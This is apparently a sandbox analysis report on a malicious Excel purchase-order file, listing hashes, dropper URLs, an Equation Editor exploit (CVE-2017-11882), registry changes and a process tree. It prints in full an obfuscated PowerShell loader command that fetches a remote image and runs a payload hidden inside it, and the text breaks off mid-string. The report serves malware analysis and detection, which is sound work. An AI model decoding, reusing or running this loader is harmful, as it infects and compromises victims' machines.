56edd334b21edd4b661a370d40e5134f848786eeceb748c838bb36948fda4366

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
30-10-2023 05:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO_7736372 xls.xls
Size

74KB
MD5

6950d76ba2aa907864c44818db028ab0
SHA1

1fc8d047c5b87cd9c0acf2eb91cb4c2495335ff1
SHA256

56edd334b21edd4b661a370d40e5134f848786eeceb748c838bb36948fda4366
SHA512

1b603b463b40636a1fd5eaf57bd0378e215b856f6bc90024b0499407ec9c7725394ddf19218c028132b4bfa8c638cece033e36f02a7397dd657a3d5556131670
SSDEEP

1536:AKt9+CX2UVnxMm7W/jI8q7siMkoRBwImV5zXOHvhR:AKt0fUdyrI8Bpko7lmV5qH

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://wallpapercave.com/uwp/uwp4098462.png

exe.dropper

https://wallpapercave.com/uwp/uwp4098462.png

Signatures

Blocklisted process makes network request 9 IoCs

flow	pid	Process
10	112	EQNEDT32.EXE
12	112	EQNEDT32.EXE
14	112	EQNEDT32.EXE
16	112	EQNEDT32.EXE
18	112	EQNEDT32.EXE
19	112	EQNEDT32.EXE
22	2444	WScript.exe
24	1084	powershell.exe
25	1084	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
112	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2560	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
684	powershell.exe
1084	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeShutdownPrivilege	2724	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2560	EXCEL.EXE
2560	EXCEL.EXE
2560	EXCEL.EXE
2724	WINWORD.EXE
2724	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 112 wrote to memory of 2444	112	EQNEDT32.EXE	31
PID 112 wrote to memory of 2444	112	EQNEDT32.EXE	31
PID 112 wrote to memory of 2444	112	EQNEDT32.EXE	31
PID 112 wrote to memory of 2444	112	EQNEDT32.EXE	31
PID 2724 wrote to memory of 1248	2724	WINWORD.EXE	32
PID 2724 wrote to memory of 1248	2724	WINWORD.EXE	32
PID 2724 wrote to memory of 1248	2724	WINWORD.EXE	32
PID 2724 wrote to memory of 1248	2724	WINWORD.EXE	32
PID 2444 wrote to memory of 684	2444	WScript.exe	33
PID 2444 wrote to memory of 684	2444	WScript.exe	33
PID 2444 wrote to memory of 684	2444	WScript.exe	33
PID 2444 wrote to memory of 684	2444	WScript.exe	33
PID 684 wrote to memory of 1084	684	powershell.exe	36
PID 684 wrote to memory of 1084	684	powershell.exe	36
PID 684 wrote to memory of 1084	684	powershell.exe	36
PID 684 wrote to memory of 1084	684	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\PO_7736372 xls.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2560

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1248

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:112
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\HTMLhistoryCleaner.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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